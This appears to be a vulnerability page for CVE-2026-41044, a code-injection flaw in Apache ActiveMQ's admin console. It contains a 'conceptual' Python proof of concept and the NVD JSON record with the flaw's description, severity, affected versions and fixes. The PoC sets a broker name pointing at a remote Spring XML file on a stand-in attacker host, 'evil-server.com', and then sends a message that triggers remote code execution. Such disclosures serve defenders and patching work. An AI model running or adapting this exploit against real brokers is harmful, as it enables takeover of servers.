CVE-2026-41044

import requests # Conceptual PoC for CVE-2026-41044 # Requirements: Valid low-privilege credentials, Apache ActiveMQ instance target_url = "http://target-ip:8161" username = "low_priv_user" password = "password" session = requests.Session() session.auth = (username, password) # Step 1: Create a broker with a malicious name containing xbean binding # This bypasses name validation and points to a remote Spring XML file malicious_broker_name = "xbean:http://evil-server.com/shell.xml" create_broker_payload = { "name": malicious_broker_name, "create": "Create" } try: # Endpoint might vary based on version, usually /admin/brokers.jsp or similar response = session.post(f"{target_url}/admin/brokers.jsp", data=create_broker_payload) if response.status_code == 200: print("[+] Malicious broker created successfully.") # Step 2: Trigger the vulnerability via DestinationView MBean # Sending a message or invoking an operation that forces the VM transport to start # This causes the loading of the remote Spring XML context trigger_payload = { "JMSDestination": "queue://TriggerQueue", "body": "RCE Trigger" } session.post(f"{target_url}/admin/send.jsp", data=trigger_payload) print("[+] Trigger sent. Check your listener for callback.") except Exception as e: print(f"[-] Exploit failed: {e}")

{"cve": {"id": "CVE-2026-41044", "sourceIdentifier": "[email protected]", "published": "2026-04-24T11:16:22.790", "lastModified": "2026-04-27T14:49:13.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ, Apache ActiveMQ Broker, Apache ActiveMQ All.\n\nAn authenticated attacker can use the admin web console page to construct a malicious broker name that bypasses name validation to include an xbean binding that can be later used by a VM transport to load a remote Spring XML application.\nThe attacker can then use the DestinationView mbean to send a message to trigger a VM transport creation that will reference this malicious broker name which can lead to loading the malicious Spring XML context file.\n\n\nBecause Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().\n\nThis issue affects Apache ActiveMQ: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ Broker: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ All: before 5.19.6, from 6.0.0 before 6.2.5.\n\nUsers are recommended to upgrade to version 6.2.5 or 5.19.6, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.19.6", "matchCriteriaId": "550C287A-18F0-462A-BFC9-2AD8A64B951A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.2.5", "matchCriteriaId": "F7BDD719-DDF9-42A2-AD9D-05FB6D758EF1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.19.6", "matchCriteriaId": "8799E3CE-EA55-4470-9582-D1948706DEAF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.2.5", "matchCriteriaId": "429CAFE7-6C7F-4670-B62D-C0D4D97D440F"}]}]}], "references": [{"url": "https://activemq.apache.org/security-advisories.data/CVE-2026-41044-announcement.txt", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/23/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}